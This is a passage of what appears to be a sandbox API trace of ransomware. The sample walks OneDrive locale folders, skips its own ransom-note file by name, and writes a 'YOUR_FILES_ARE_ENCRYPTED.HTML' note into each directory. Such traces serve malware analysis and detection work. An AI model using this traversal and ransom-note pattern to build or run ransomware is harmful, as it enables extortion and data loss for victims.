PathFindExtensionW (pszPath="Telemetry.dll") returned=".dll" [0162.844] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0162.844] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\Telemetry.dll" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\telemetry.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0162.844] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab973c30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xabaa4730, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xabaa4730, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="tg", cAlternateFileName="")) returned 1 [0162.844] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tg") returned 74 [0162.844] GetProcessHeap () returned 0x270000 [0162.844] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.844] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tg" [0162.844] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tg", lpString2="\\*" | out: 
lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tg\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tg\\*" [0162.844] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tg\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab973c30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xabaa4730, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xabaa4730, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.846] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab973c30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xabaa4730, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xabaa4730, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.846] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabaa4730, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xabaa4730, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xabaa4730, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x13ca8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.846] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tg\\FileSync.LocalizedResources.dll.mui") returned 110 [0162.846] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.846] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.846] lstrlenW (lpString=".mui") returned 4 [0162.846] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.846] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabaa4730, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xabaa4730, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xabaa4730, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x13ca8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.846] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.846] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tg\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0162.847] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tg\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\tg\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0162.847] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, 
lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.850] CloseHandle (hObject=0x5ac) returned 1 [0162.850] GetProcessHeap () returned 0x270000 [0162.851] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.851] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xabaa4730, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xabbd5230, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xabbd5230, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="tg-cyrl", cAlternateFileName="")) returned 1 [0162.851] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tg-cyrl") returned 79 [0162.851] GetProcessHeap () returned 0x270000 [0162.851] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.851] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tg-cyrl" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tg-cyrl") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tg-cyrl" [0162.851] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tg-cyrl", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tg-cyrl\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tg-cyrl\\*" [0162.851] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tg-cyrl\\*", 
lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xabaa4730, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xabbd5230, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xabbd5230, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.852] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xabaa4730, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xabbd5230, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xabbd5230, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.852] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabbd5230, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xabbd5230, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xabbd5230, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x13ca8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.852] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tg-cyrl\\FileSync.LocalizedResources.dll.mui") returned 115 [0162.852] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.852] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.852] 
lstrlenW (lpString=".mui") returned 4 [0162.852] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.852] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabbd5230, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xabbd5230, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xabbd5230, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x13ca8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.852] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.852] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tg-cyrl\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 109 [0162.852] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tg-cyrl\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\tg-cyrl\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0162.853] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.855] CloseHandle (hObject=0x5ac) returned 1 [0162.856] GetProcessHeap () returned 0x270000 [0162.856] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.856] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: 
lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xabbd5230, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xabd05d30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xabd05d30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="th", cAlternateFileName="")) returned 1 [0162.857] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\th") returned 74 [0162.857] GetProcessHeap () returned 0x270000 [0162.857] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.857] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\th" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\th") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\th" [0162.857] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\th", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\th\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\th\\*" [0162.857] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\th\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xabbd5230, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xabd05d30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xabd05d30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, 
cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.858] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xabbd5230, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xabd05d30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xabd05d30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.858] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabd05d30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xabd05d30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xabd05d30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x118b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.858] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\th\\FileSync.LocalizedResources.dll.mui") returned 110 [0162.858] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.858] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.858] lstrlenW (lpString=".mui") returned 4 [0162.858] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.858] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabd05d30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xabd05d30, 
ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xabd05d30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x118b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.858] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.859] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\th\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0162.859] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\th\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\th\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0162.859] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.862] CloseHandle (hObject=0x5ac) returned 1 [0162.863] GetProcessHeap () returned 0x270000 [0162.864] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.864] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xabd05d30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xabe82af0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xabe82af0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ti", cAlternateFileName="")) returned 1 
[0162.864] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ti") returned 74 [0162.864] GetProcessHeap () returned 0x270000 [0162.864] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.864] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ti" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ti") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ti" [0162.864] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ti", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ti\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ti\\*" [0162.864] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ti\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xabd05d30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xabe82af0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xabe82af0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.864] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xabd05d30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xabe82af0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xabe82af0, 
ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.864] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabe82af0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xabe82af0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xabe82af0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0xf6b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.864] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ti\\FileSync.LocalizedResources.dll.mui") returned 110 [0162.864] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.864] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.864] lstrlenW (lpString=".mui") returned 4 [0162.864] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.865] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabe82af0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xabe82af0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xabe82af0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0xf6b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.865] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.865] wnsprintfW (in: 
pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ti\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0162.865] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ti\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\ti\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0162.865] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.867] CloseHandle (hObject=0x5ac) returned 1 [0162.868] GetProcessHeap () returned 0x270000 [0162.868] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.869] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xabe82af0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xabfb35f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xabfb35f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="tk-tm", cAlternateFileName="")) returned 1 [0162.869] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tk-tm") returned 77 [0162.869] GetProcessHeap () returned 0x270000 [0162.869] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.869] lstrcpyW (in: lpString1=0x74d2010, 
